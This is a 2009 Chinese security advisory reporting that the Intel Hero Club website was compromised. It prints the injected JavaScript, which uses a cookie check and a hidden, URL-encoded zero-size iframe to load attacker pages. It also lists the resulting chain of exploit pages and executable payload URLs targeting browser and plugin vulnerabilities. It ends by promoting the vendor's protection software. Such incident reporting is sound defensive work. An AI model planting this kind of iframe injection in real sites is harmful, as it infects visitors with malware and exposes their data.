英特尔英雄会网站被植入恶意代码
发布时间:Sat, 3 Jan 2009 11:41:33 UTC
最后更新时间:Sat, 3 Jan 2009 11:41:33 UTC
知道创宇安全团队于今天捕获英特尔英雄会网站(www.i-hero.cn)被植入恶意代码,用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.i-hero.cn/flasha.js
访问该页面会被365门神拦截恶意攻击:
网站脚本中被插入一段恶意代码:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = “Cookie1=risb;expires=”+ Then.toGMTString()
document.writeln(”<iframe src=http:////%61%66%64%66%34%64%73%34%66%34%64%2E%63%6E//a108.htm width=0 height=0><//iframe>”);
}
}Get();
挂马分析:
[wide]http://www.i-hero.cn/flasha.js
[frame]http://afdf4ds4f4d.cn/a108.htm
[frame]http://afdf4ds4f4d.cn/wwe.htm
[frame]http://afdf4ds4f4d.cn/year.htm //flash漏洞
[frame]http://afdf4ds4f4d.cn/wm/cy.htm //超星漏洞
[exe]http://dfe44d1f.cn/xz/cx.css
[frame]http://afdf4ds4f4d.cn/wm/s.htm //IE7 漏洞
[exe]http://fdfe1fd12f.cn/xz/ie.css
[frame]http://afdf4ds4f4d.cn/wm/14.jpg //MS06-014漏洞
[exe]http://dfe1212fd21f.cn/xz/14.css
[frame]http://afdf4ds4f4d.cn/wm/of.htm //snapshot漏洞
[exe]http://fdfe1fd12f.cn/wm/b.css
[frame]http://afdf4ds4f4d.cn/wm/no.htm //新浪DLoader Class ActiveX漏洞
[exe]http://fdfe1fd12f.cn/xz/x.css
[frame]http://afdf4ds4f4d.cn/wm/bf.htm //暴风影音漏洞
[exe]http://fdfe1fd12f.cn/xz/f.css
[frame]http://afdf4ds4f4d.cn/wm/nlz.html //联众漏洞
[exe]http://fdfe1fd12f.cn/xz/nlz.css
[frame]http://afdf4ds4f4d.cn/wm/l.htm //联众漏洞
[exe]http://fdfe1fd12f.cn/xz/l.css
[frame]http://afdf4ds4f4d.cn/wm/l.gif //联众漏洞
[exe]http://fdfe1fd12f.cn/xz/d.css
[frame]http://afdf4ds4f4d.cn/wm/r.htm //REALPLAYER漏洞
[exe]http://fdfe1fd12f.cn/xz/r.css
[frame]http://afdf4ds4f4d.cn/wm/o.html //REALPLAYER漏洞
[exe]http://fdfe1fd12f.cn/xz/o.css
[script]http://js.tongji.cn.yahoo.com/886375/ystat.js
推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com